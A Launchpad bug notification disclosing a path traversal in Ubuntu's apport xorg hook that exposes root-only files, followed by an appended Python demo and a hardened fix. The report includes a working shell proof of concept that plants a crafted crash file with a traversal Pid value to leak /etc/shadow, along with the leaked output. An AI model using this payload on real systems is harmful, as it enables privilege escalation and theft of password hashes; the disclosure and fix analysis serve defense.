** Changed in: openjdk-13 (Ubuntu)
   Status: New => Won't Fix

** Changed in: openjdk-14 (Ubuntu)
   Status: New => Won't Fix

** Changed in: openjdk-15 (Ubuntu)
   Status: New => Won't Fix

** Changed in: openjdk-16 (Ubuntu)
   Status: New => Won't Fix

** Changed in: openjdk-17 (Ubuntu)
   Status: New => Won't Fix

** Changed in: openjdk-18 (Ubuntu)
   Status: New => Won't Fix

** Changed in: openjdk-8 (Ubuntu)
   Status: New => Won't Fix

** Changed in: xorg (Ubuntu)
   Status: New => Won't Fix

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1933832

Title:
  Path traversal leads to arbitrary file read

Status in apport package in Ubuntu:
  Fix Released
Status in openjdk-13 package in Ubuntu:
  Won't Fix
Status in openjdk-14 package in Ubuntu:
  Won't Fix
Status in openjdk-15 package in Ubuntu:
  Won't Fix
Status in openjdk-16 package in Ubuntu:
  Won't Fix
Status in openjdk-17 package in Ubuntu:
  Won't Fix
Status in openjdk-18 package in Ubuntu:
  Won't Fix
Status in openjdk-8 package in Ubuntu:
  Won't Fix
Status in xorg package in Ubuntu:
  Won't Fix

Bug description:
  While reiterating the issues reported in
  https://bugs.launchpad.net/bugs/1917904, Stephen Röttger (@_tsuro)
  mentioned that the second issue "Arbitrary file read in
  package-hooks/source_xorg.py (Info)" might additionally contain a path
  traversal vulnerability. This was confirmed by developing a PoC that
  enables a user to read arbitrary files in the context of the root user,
  leading to elevation of privileges. Exploiting this issue requires that
  automatic crash reporting is enabled.
  The following excerpt of the file `package-hooks/source_xorg.py` shows
  the vulnerable code:

      if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
          compiz_pid = 0
          pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])  # [0]
          if pid_line:
              compiz_pid = pid_line.groups()[0]
          compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid  # [1]
          attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")

  While in [0] the `pid_line` is extracted, this value (if successfully
  matched) is appended to the file path resulting in `compiz_state_file`
  [1], which is subsequently attached to the crash file. Using a `Pid`
  such as `JRN/../../../../etc/shadow` therefore results in the file
  `/etc/shadow` being attached (after creating the directory
  `/tmp/compiz_internal_stateJRN`).

  The following PoC (tested on 20.04/21.04 Desktop) exploits this issue
  to read the file `/etc/shadow`:

      mkdir /tmp/compiz_internal_stateJRN/;pid=$'\tJRN/../../../etc/shadow';cat << EOF > /var/crash/poc.crash
      ProblemType: Crash
      ExecutablePath: /poc
      Package: source_xorg 123
      SourcePackage: compiz
      ProcStatus:
       Pid:$pid
       Uid:$pid
      EOF

  When reading the crash file (after `whoopsie-upload-all` ran), the
  contents of the file `/etc/shadow` are indeed attached:

      grep -A3 compiz_internal /var/crash/poc.crash
      compiz_internal_states:
       root:!:18393:0:99999:7:::
       daemon:*:18375:0:99999:7:::
       bin:*:18375:0:99999:7:::

  Please credit Stephen Röttger (@_tsuro) in a potential CVE/USN.

  Best regards,
  Maik

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
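The Pid handling the report describes, reproduced next to a hardened variant, as an added example that is neither the reporter's PoC nor apport's own code. It assumes (my simplification, not the page's) that the hook's `report` is a plain dict, that attaching a file means reading it into that dict, and that a temporary directory stands in for `/tmp` and `/etc/shadow` so the whole thing runs offline; the function names `vulnerable_state_path`, `hardened_state_path` and `demo` are mine.

```python
"""Vulnerable vs. hardened handling of the Pid field from ProcStatus.

Added example, not apport's code. The stand-in for attach_file_if_exists
and the fake /tmp and /etc layout under a temporary directory are
assumptions made so the example runs offline.
"""
import os
import re
import tempfile

STATE_PREFIX = "compiz_internal_state"


def attach_file_if_exists(report, path, key):
    # Stand-in for apport.hookutils.attach_file_if_exists (assumption):
    # if `path` exists, its contents land in the report under `key`.
    if path and os.path.exists(path):
        with open(path, "rb") as fh:
            report[key] = fh.read().decode("utf-8", "replace")


def vulnerable_state_path(report, state_dir):
    """The hook's logic: whatever follows 'Pid:\\t' is glued onto the path.

    `state_dir` replaces the hard-coded /tmp so the demo can run anywhere.
    Nothing stops the value from containing '/' or '..', which is the bug.
    """
    compiz_pid = 0
    pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
    if pid_line:
        compiz_pid = pid_line.groups()[0]
    return "%s/%s%s" % (state_dir, STATE_PREFIX, compiz_pid)


def hardened_state_path(report, state_dir):
    """Accept only an all-digit PID, then confirm the resolved path stays
    directly inside `state_dir` (realpath also follows symlinks, so a
    symlinked state file pointing elsewhere is rejected as well)."""
    match = re.search(r"^Pid:\t(\d+)$", report.get("ProcStatus", ""), re.MULTILINE)
    if not match:
        return None
    candidate = os.path.join(state_dir, STATE_PREFIX + match.group(1))
    resolved = os.path.realpath(candidate)
    if os.path.dirname(resolved) != os.path.realpath(state_dir):
        return None
    return resolved


def demo():
    """Build a fake /tmp and /etc under a temp dir and run both variants
    against a traversal payload and against a legitimate PID."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        state_dir = os.path.join(root, "tmp")
        # The attacker-created directory that the traversal walks out of.
        os.makedirs(os.path.join(state_dir, STATE_PREFIX + "JRN"))
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, "etc", "shadow"), "w") as fh:
            fh.write("root:!:18393:0:99999:7:::\n")  # constructed sample line
        with open(os.path.join(state_dir, STATE_PREFIX + "1234"), "w") as fh:
            fh.write("legit state\n")  # constructed legitimate state file

        # Two '..' climb from <root>/tmp/compiz_internal_stateJRN to <root>.
        traversal = "\tJRN/../../etc/shadow"
        evil = {"ProcStatus": "Name:\tpoc\nPid:%s\nUid:%s\n" % (traversal, traversal)}
        legit = {"ProcStatus": "Name:\tcompiz\nPid:\t1234\nUid:\t1000\n"}

        attach_file_if_exists(evil, vulnerable_state_path(evil, state_dir), "compiz_internal_states")
        results["vulnerable_leaks_shadow"] = evil.get("compiz_internal_states", "").startswith("root:!:")

        results["hardened_rejects_traversal"] = hardened_state_path(evil, state_dir) is None

        attach_file_if_exists(legit, hardened_state_path(legit, state_dir), "compiz_internal_states")
        results["hardened_keeps_legit"] = legit.get("compiz_internal_states") == "legit state\n"
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print("%-28s %s" % (name, ok))
```

Restricting the PID to digits is necessary but not sufficient on its own: `/tmp` is world-writable, so a local user can still pre-create `/tmp/compiz_internal_state<pid>` as a symlink to a file only root can read. The `realpath` containment check above catches that, but a check-then-open sequence is still racy, so a hook that must read from `/tmp` should open with `O_NOFOLLOW` (or not read attacker-controllable paths as root at all).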